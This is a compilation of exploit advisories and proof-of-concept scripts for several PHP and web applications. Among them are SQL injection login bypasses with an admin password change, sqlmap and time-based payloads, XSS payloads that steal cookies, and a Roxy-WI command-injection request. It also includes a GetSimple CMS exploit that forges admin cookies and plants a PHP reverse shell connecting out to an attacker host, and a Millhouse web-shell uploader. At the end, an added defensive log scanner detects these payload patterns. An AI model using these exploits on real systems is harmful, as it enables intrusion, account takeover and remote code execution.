<pre><code>## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing
## Author: nu11secur1ty
## Date: 05.25.2023
## Vendor: https://github.com/nikhilkeshava
## Software: https://github.com/nikhilkeshava/online-course-registration-
## Reference: https://portswigger.net/web-security/sql-injection,
https://portswigger.net/web-security/sql-injection/lab-login-bypass

## Description:
The `username` parameter appears to be vulnerable to SQL injection
attacks. The payloads 77834251' or 6127=6127-- and 98762777' or
4535=4542-- were each submitted in the username parameter. These two
requests resulted in different responses, indicating that the input is
unsafely incorporated into a SQL query. The attacker can use this
login bypass vulnerability to send a remote POST request to set a new
administrator password for himself, which is absolutely nasty.

STATUS: HIGH Vulnerability

[+]Payload:
```POST
POST /online-course-registration/admin/index.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=38468sipptm9j24j9e8svavpgn
Content-Length: 62
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/online-course-registration/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=

```
[+]Exploit:
```POST
POST /online-course-registration/admin/change-password.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=38468sipptm9j24j9e8svavpgn
Content-Length: 58
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/online-course-registration/admin/change-password.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

cpass=password&newpass=password5&cnfpass=password5&submit=

```


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)

## Time spent:
01:15:00


</code></pre>
<pre><code># Exploit Title: WFTPD 3.25 - Unprotected Credential Storage
# Date: 04/01/2023
# Exploit Author: golem445
# Vendor Homepage: https://www.texis.com/
# Tested on: Windows 10
# CVE: CVE-2023-33263

# Description:

Usernames and hashes are stored in an openly viewable wftpd.ini configuration file within the host WFTPD directory
</code></pre>
<pre><code># Exploit Title: Service Provider Management System v1.0 - SQL Injection
# Date: 2023-05-23
# Exploit Author: Ashik Kunjumon
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
# Version: 1.0
# Tested on: Windows/Linux

1. Description:

Service Provider Management System v1.0 allows SQL Injection via the ID
parameter in /php-spms/?page=services/view&id=2
Exploiting this issue could allow an attacker to compromise the
application, access or modify data, or exploit the latest vulnerabilities
in the underlying database.

Endpoint: /php-spms/?page=services/view&id=2

Vulnerable parameter: id (GET)

2. Proof of Concept:
----------------------

Step 1 - By visiting the URL
http://localhost/php-spms/?page=services/view&id=2 just add a single quote to
verify the SQL Injection.
Step 2 - Run sqlmap -u "http://localhost/php-spms/?page=services/view&id=2" -p id --dbms=mysql

SQLMap Response:
----------------------
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=services/view&id=1' AND (SELECT 1072 FROM (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

</code></pre>
<pre><code># Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
# Date: 2023-05-24
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.squarepiginteractive.com
# Software Link: https://www.fusioninvoice.com/store
# Version: 2023-1.0
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)
# CVE: CVE-2023-25439

Description:

A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows an attacker to
execute arbitrary web scripts or HTML.

By injecting persistent JavaScript code into the title and/or description while creating a task/expense/project (and
possibly others), the code will be triggered once the page is loaded.


Steps to reproduce:

- Click on "Expenses", or "Tasks" and add (or edit an existing) one,
- Insert a PoC payload inside a field, for example in the "Phone number" (or "Description"),
- Click on 'Save'.

When visiting the website dashboard, as well as the customer or project summary page, the JavaScript code will be executed.


Timeline:

2023-01-29: Vulnerability discovered
2023-01-29: Vendor contacted
2023-02-01: No reply, vendor contacted for 2nd time
2023-02-02: Request for CVE reservation
2023-04-25: Assigned CVE number CVE-2023-25439
2023-04-27: No reply, vendor contacted for 3rd time
2023-05-15: No reply, vendor contacted for last time
2023-05-24: Public disclosure


PoC Screenshots:

https://imagebin.ca/v/7FOZfztkDs3I


</code></pre>
<pre><code># Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
# Date: 18/5/2023
# Exploit Author : Youssef Muhammad
# Vendor: Get-simple
# Software Link:
# Version app: 3.3.16
# Tested on: linux
# CVE: CVE-2022-41544

import sys
import hashlib
import re
import requests
from xml.etree import ElementTree

purple = "\033[0;35m"
reset = "\033[0m"
yellow = "\033[93m"
blue = "\033[34m"
red = "\033[0;31m"


def print_the_banner():
    print(purple + '''
 CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 
C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 
C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 
C V V E 2 00 0 2 2 4 11 5 4 4 
 CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4 
 ''' + reset)


def get_version(target, path):
    # The admin login page embeds the version in the jquery.getsimple.js query string
    r = requests.get(f"http://{target}{path}admin/index.php")
    match = re.search(r'jquery.getsimple.js\?v=(.*)"', r.text)
    if match:
        version = match.group(1)
        if version <= "3.3.16":
            print(red + f"[+] the version {version} is vulnerable to CVE-2022-41544")
        else:
            print("This is not vulnerable to this CVE")
        return version
    return None


def api_leak(target, path):
    # data/other/authorization.xml is reachable through the web root and holds the site API key
    r = requests.get(f"http://{target}{path}data/other/authorization.xml")
    if r.ok:
        tree = ElementTree.fromstring(r.content)
        apikey = tree[0].text
        print(f"[+] apikey obtained {apikey}")
        return apikey
    return None


def set_cookies(username, version, apikey):
    # Cookie name and value are both derived from the API key, so a leaked key lets them be recomputed
    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': cookies
    }
    return headers


def get_csrf_token(target, path, headers):
    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
    m = re.search('nonce" type="hidden" value="(.*)"', r.text)
    if m:
        print("[+] csrf token obtained")
        return m.group(1)
    return None


def upload_shell(target, path, headers, nonce, shell_content):
    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
    payload = {
        'content': shell_content,
        'edited_file': '../shell.php',
        'nonce': nonce,
        'submitsave': 1
    }
    try:
        response = requests.post(upload_url, headers=headers, data=payload)
        if response.status_code == 200:
            print("[+] Shell uploaded successfully!")
        else:
            print("(-) Shell upload failed!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while uploading the shell:", e)


def shell_trigger(target, path):
    url = f"http://{target}{path}/shell.php"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            print("[+] Webshell triggered successfully!")
        else:
            print("(-) Failed to visit the page!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while visiting the page:", e)


def main():
    if len(sys.argv) != 5:
        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
        return

    target = sys.argv[1]
    path = sys.argv[2]
    if not path.endswith('/'):
        path += '/'

    ip, port = sys.argv[3].split(':')
    username = sys.argv[4]
    shell_content = f"""<?php
    $ip = '{ip}';
    $port = {port};
    $sock = fsockopen($ip, $port);
    $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
    """

    version = get_version(target, path)
    if not version:
        print("(-) could not get version")
        return

    apikey = api_leak(target, path)
    if not apikey:
        print("(-) could not get apikey")
        return

    headers = set_cookies(username, version, apikey)

    nonce = get_csrf_token(target, path, headers)
    if not nonce:
        print("(-) could not get nonce")
        return

    upload_shell(target, path, headers, nonce, shell_content)
    shell_trigger(target, path)


if __name__ == '__main__':
    print_the_banner()
    main()

</code></pre>
<pre><code><?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/


$options = getopt('u:c:');

if (!isset($options['u'], $options['c']))
    die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");

$target = $options['u'];

$command = $options['c'];

$url = $target . '/includes/add_post_sql.php';


// multipart body of a new post whose "image" part carries a .php filename
$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="title"

helloworld
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="description"

<p>sdsdsds</p>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="category"

1
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="image"; filename="rose.php"
Content-Type: application/x-php

<?php
$shell = shell_exec("' . $command . '");
echo $shell;
?>

------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
';

// the boundary must be on the same header line as the media type
$headers = array(
    'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
    'Cookie: PHPSESSID=rose1337',
);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
curl_close($ch);

// execute command

$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
$ch = curl_init($shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exec_shell = curl_exec($ch);
curl_close($ch);
echo "\033[1;32m \n" . $exec_shell . "\033[0m\n \n";

?>
</code></pre>
<pre><code># Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
# Exploit Author: Iyaad Luqman K
# Application: Roxy WI <= v6.1.0.0
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31137


# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1


</code></pre>
<pre><code># Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Date: 16/05/2023
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31702

*Steps of Reproduction / Proof of Concept (POC)*

1. Log in to the eScan Management Console with a valid username and
password as root user.
2. Navigate to the URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
3. Inject the payload into the UsrId parameter to confirm the SQL
injection as shown below:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176
4. The time delay of 5 seconds confirmed that the "UsrId" parameter was
vulnerable to SQL Injection. Furthermore, it was also possible to dump
all the databases and inject an OS shell directly into the MS SQL Server
using the SQLMap tool.

</code></pre>
<pre><code># Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
# Date: 15 May 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://qloapps.com/
# Software Link: https://github.com/webkul/hotelcommerce
# Version: 1.5.2
# Tested on: Kali Linux 2022.4
# CVE : CVE-2023-30256


Description:

A Cross-Site Scripting (XSS) vulnerability exists in Webkul Qloapps, which is a free and open-source hotel reservation & online booking system written in PHP and distributed under the OSL-3.0 licence.

Steps to exploit:
1) Go to the Sign-in page on the system.
2) There are two parameters which can be exploited via XSS:
   - back
   - email_create

2.1) Insert your payload in the "back" parameter - GET and POST request
   Proof of concept (PoC):
   The following payload will allow you to execute XSS -

   Payload (Plain text):
   xss onfocus=alert(1) autofocus= xss

   Payload (URL Encoded):
   xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

   Full GET Request (back):
   [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" parameter - POST request only
   Proof of concept (PoC):
   The following payload will allow you to execute XSS -

   Payload (Plain text):
   xss><img src=a onerror=alert(document.cookie)>xss

   Payload (URL Encoded):
   xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

   POST Request (email_create) (POST REQUEST DATA ONLY):
   [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

</code></pre>
<pre><code># Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
# Date: 2023-05-16
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31703

*Steps of Reproduction / Proof of Concept (POC)*

1. Log in to the eScan Management Console with valid user credentials.
2. Navigate to the URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now inject the Cross-Site Scripting payload into the "from" parameter as
shown below; a valid XSS pop-up appeared.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
4. By exploiting this vulnerability, any arbitrary attacker could have
stolen an admin user's session cookie to perform account takeover.

</code></pre>
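The injected values quoted across these advisories (the login-bypass body against Online Course Registration, the sqlmap payloads against php-spms, the WAITFOR probe against the eScan console, the `";id ##` body against Roxy-WI and the onfocus/onerror payloads against Qloapps) share a handful of shapes that a defender can look for in request logs. The Python below is an added example, not code from any of the advisories or projects above: it decodes the parameters of constructed access-log lines (the log format, client addresses and lines are made up for this example) and reports which parameter carried each shape.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed log format (not a real product's): common-log request line, status and size,
# then an optional " body=" field that a proxy configured to record POST bodies might add.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d{3} \d+(?: body=(?P<body>.*))?$')

# Each heuristic is derived from a payload quoted on this page; applied to the decoded, lower-cased value.
PATTERNS = [
    ("sqli-boolean", re.compile(r"'\s*(?:or|and)\s+\d+\s*=\s*\d+")),           # ' or 1=1#  /  1' AND 8462=8462
    ("sqli-time", re.compile(r"waitfor\s+delay|sleep\s*\(")),                   # ;WAITFOR DELAY '0:0:5'--  /  SLEEP(5)
    ("sqli-error", re.compile(r"floor\s*\(\s*rand\s*\(|information_schema")),   # FLOOR(RAND(0)*2) ... INFORMATION_SCHEMA
    ("cmdi-shell-meta", re.compile(r"""["'`]\s*;\s*\w+""")),                    # ";id ##  (close the quote, start a command)
    ("xss-handler", re.compile(r"<script|\bon(?:focus|error|load)\s*=")),       # onfocus=alert(1)  /  <img onerror=...>
]


def split_params(encoded):
    """Decode a query string or form body into (name, value) pairs; splits on '&' only, so ';' stays inside values."""
    pairs = []
    for part in encoded.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify(value):
    """Return the label of every heuristic the decoded value matches, in PATTERNS order."""
    lowered = value.lower()
    return [label for label, rx in PATTERNS if rx.search(lowered)]


def scan_line(line):
    """Return (parameter, label) findings for one log line; [] if the line is clean or unparseable."""
    m = LOG_RE.search(line)
    if not m:
        return []
    params = split_params(urlsplit(m.group("target")).query)
    if m.group("body"):
        params += split_params(m.group("body"))
    return [(name, label) for name, value in params for label in classify(value)]


def scan_log(lines):
    """Map the index of each flagged line to its findings; clean lines are omitted."""
    report = {}
    for i, line in enumerate(lines):
        findings = scan_line(line)
        if findings:
            report[i] = findings
    return report


# Constructed sample lines: the attack values are the ones quoted in the advisories above.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/May/2023:10:00:01 +0000] "POST /online-course-registration/admin/index.php HTTP/1.1" 302 0 body=username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=',
    '198.51.100.7 - - [25/May/2023:10:00:02 +0000] "GET /php-spms/?page=services/view&id=1%27%20AND%20(SELECT%201072%20FROM%20(SELECT(SLEEP(5)))lurz)%20AND%20%27RQzT%27%3D%27RQzT HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/May/2023:10:00:03 +0000] "GET /ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR%20DELAY%20%270:0:5%27--&cnt=4176 HTTP/1.1" 200 812',
    '198.51.100.7 - - [25/May/2023:10:00:04 +0000] "POST /app/options.py HTTP/1.1" 200 233 body=show_versions=1&token=&ipbackend=";id+##&backend_server=127.0.0.1',
    '198.51.100.7 - - [25/May/2023:10:00:05 +0000] "GET /hotelcommerce-1.5.2/?controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss HTTP/1.1" 200 411',
    '203.0.113.9 - - [25/May/2023:10:00:06 +0000] "GET /php-spms/?page=services/view&id=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/May/2023:10:00:07 +0000] "POST /online-course-registration/admin/index.php HTTP/1.1" 302 0 body=username=admin&password=correct-horse&submit=',
]
```

Running `scan_log(SAMPLE_LOG)` flags the first five lines by the parameter that carried the payload and leaves the two clean requests out; the heuristics are deliberately narrow, so treat them as a starting point for alerting rather than a complete filter.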